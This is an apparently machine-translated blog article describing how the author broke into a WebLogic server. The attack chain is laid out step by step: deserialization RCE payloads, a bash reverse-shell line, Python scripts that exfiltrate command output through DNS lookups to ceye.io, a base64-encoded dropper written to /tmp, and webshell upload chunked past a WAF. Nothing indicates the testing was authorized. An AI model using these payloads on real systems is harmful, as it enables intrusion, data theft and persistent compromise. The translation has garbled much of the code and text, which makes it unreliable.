Shulou(Shulou.com)06/01 Report--

This article introduces how to use dnslog to implement weblogic commands. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

Encountered a weblogic site:

Visit several common paths to see if they exist:

/ console/login/LoginForm.jsp/uddiexplorer/SearchPublicRegistries.jsp/wls-wsat/CoordinatorPortType/_async/AsyncResponseService

Luckily, there happens to be a path of / _ async/AsyncResponseService:

Take out a wave of shack2's weblogic RCE tools to verify:

The tool failed, and it is speculated that it may be intercepted by waf. Curiously, I tried one by one with the payload I collected, but I didn't expect to successfully execute a payload that can obtain dnslog records:

Xxxxcom.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext http://zdg537uqx2an3qcx104ez2ak6bc10q.burpcollaborator.net

This is the payload of 2729, so the payload executed by the corresponding command is used to execute the command, and it fails. A great god instructed that you can use 2725 payload to play:

So I found 2725 of the payload released by HW last year:

Xx xx / bin/bash-c bash-I & ampgt;& / dev/tcp/ip/port 0

But there is a new problem. This is a payload that cannot echo the result of the command, but I went to consult the great god, who gave me the idea to get the result through dnslog, and also gave me the script:

P.py:

Import osimport sysimport subprocessdef exp (cmd, id): P = subprocess.Popen (cmd, shell=True, stdout=subprocess.PIPE) p.wait () pipe = p.stdout I = 100while True: result = pipe.read (30) if not result: break os.popen ('wget-no-dns-cache-tries=1-T 1-output-document=/dev/null% s.% s.xx.ceye.io'% (id, I Result.encode ('hex') I + = 1exp (sys.argv [1], sys.argv [2])

Result.py:

Import requestsimport sysfrom requests.exceptions import RequestExceptionfrom requests.packages.urllib3.exceptions import InsecureRequestWarningdnslog_exec = u "i2kuwq.ceye.io" dnslog_exec_api = u "http://api.ceye.io/v1/records?token=xxxxxxxxxx1ae18f473ef27d0a&type=dns&filter={0}"req = requests.get (dnslog_exec_api.format (sys.argv [1])) Timeout=30) rsp = req.json () if rsp [u "data"]: exec_result = list (set ([RSP [u "data"] [I] [u "name"] for i in xrange (len (RSP [u 'data']) exec_result.sort () print (u "" .join (map (lambda n: n [4 + 5:-1-len (dnslog_exec)]) Exec_result) .decode ("hex"). Strip () else: print u "No output."

The ideas are as follows:

1. Use the echo command to write the p.py to the tmp directory, then execute the code using python, execute the command through the python script, and then request the hex coding of the command result to dnslog.

2. The local execution result.py script calls ceyeAPI to obtain the dnslog record, and hex decoding to obtain the result content.

Write a file:

Touch / tmp/pp.py & & echo aW1wb3J0IG9zCmltcG9ydCBzeXMKaW1wb3J0IHN1YnByb2Nlc3MKCmRlZiBleHAoY21kLCBpZCk6CiAgICBwID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwc**jZXNzLlBJUEUpCiAgICBwLndhaXQoKQogICAgcGlwZSA9IHAuc3Rkb3V0CiAgICBpID0gMTAwCiAgICB3aGlsZSBUcnVlOgogICAgICAgIHJlc3VsdCA9IHBpcGUucmVhZCgzMCkKICAgICAgICBpZiBub3QgcmVzdWx0OiBicmVhawogICAgICAgIG9zLnBvcGVuKCd3Z2V0IC0tbm8tZG5zLWNhY2hlIC0tdHJpZXM9MSAtVCAxIC0tb3V0cHV0LWRvY3VtZW50PS9kZXYvbnVsbCAlcy4lcy4lcy4wYWN5ZncuY2V5ZS5pbycgJSAoaWQsIGksIHJlc3VsdC5lbmNvZGUoJ2hleCcpKSkKICAgICAgICBpICs9IDEKCmV4cChzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCg== | base64-d > / tmp/pp.py

Execute the command:

/ usr/bin/python / tmp/pp.py command 1234

View the dnslog record:

Local read result:

Python2 result.py 1235

Finally, get the web path through the dnslog record, and then write to the webshell file:

The pit encountered in the process of writing a horse:

1. There is a waf in the website, which will be triggered when the length of the POST content exceeds 200, so the webshell can only be written in segments.

2. It is suspected that the previous use of tools for verification is also due to the fact that the data packet is too long to trigger waf and the command cannot be executed.

3. The dnslog record obtained through the api API of ceye cannot exceed 5 pages, and more than 5 pages will be overwritten.

On the implementation of weblogic commands how to use dnslog to share here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.